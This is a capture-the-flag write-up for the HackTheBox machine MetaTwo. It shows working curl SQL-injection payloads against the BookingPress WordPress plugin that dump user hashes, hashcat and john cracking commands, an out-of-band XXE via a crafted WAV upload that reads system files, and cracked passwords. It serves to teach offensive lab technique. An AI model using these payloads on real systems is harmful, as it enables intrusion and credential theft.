Meta-Two from HackTheBox was an easy rated linux machine that involved an un-authenticated SQL Injection in a plugin allowing us to login wordpress dashboard, further it had another plugin vulnerable to XXE allowing us to read wp-config.php, giving access to FTP, from there finding the credentials for jnelson and getting a foothold, reading the PGP message through the private key gave us the password which worked on the root user.
NMAP
Nmap scan report for metapress.htb (10.10.11.186)
Host is up (0.13s latency).
Not shown: 947 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
| 256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_ 256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.6.2
|_http-title: MetaPress – Official company site
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0PORT 80
Visting the webserver, it redirects to metapress.htb
Adding the domain name in /etc/hosts file
From wappalyzer, it seems that it’s using wordpress version 5.6.2
So running wpscan against the url
wpscan --url http://metapress.htb/
It only returned the version which we already knew but didn't found any plugins, searching for CVEs related to wordpress, it shows sql injection via WP_QUERY in wordpress version till 5.8.2 which means this version might be vulnerable as well but it didn't worked
There was another CVE specifically for this version but it was an authenticated XXE so probably we’ll need to login
Enumerating site by going to /events and viewing the source, will show a plugin named booking press being used, not sure why wpscan didn’t find it
This plugin has an un-authenticated sql injection
We just only need the nonce which we can get the from view source
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=ef5a981727&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
But we don’t have to worry about getting column names as it’s wordpress so we can google for columns for wp_users table
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login,user_pass),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
Cracking the hashes with hashcat, we'll get manager's password partylikearockstar
hashcat -a 0 -m 400 ./hash.txt /usr/share/wordlists/rockyou.txt --force
And now we can login on wordpress with manager user
Foothold
Looking back at the authenticated XXE, we can try that
We need to generate a malicious wav file which will perform an out of band or blind XXE attack by fetching the dtd from our server which is going to read the /etc/passwd file and present the output to us
Before running the script, make sure install wavefile npm package with npm -i wavefile
Simply upload the malicious.wav file through Media Library option and check the listener
Decoding the base64 file contents we’ll get /etc/password from the target machine
Now reading wp-config.php which should one directory back
With these credentials we can login to ftp
By going into mailer directoy, there's send_mail.php from where we can find jnelson's password and login through ssh
Privilege Escalation
Checking the files which are owned by jnelson group, we see few files related to passpie which is a command line manager
Here we’ll see the pgp message that is encrypted
We’ll also find the pgp private key from /home/.passpie/keys
To crack the pgp message we need to know the password of the private key so that we can import it and do that we can use gpg2john
/usr/sbin/gpg2john ./private.key > private_hash
john --wordlist=/usr/share/wordlists/rockyou.txt private_hash
With the password blink182 we can import the private key
We can export passwords from passpie as well with export option by specifying the private key password and the path where we want to save the file
References
- https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
- https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
- https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5
- https://github.com/motikan2010/CVE-2021-29447
- https://codex.wordpress.org/Database_Description
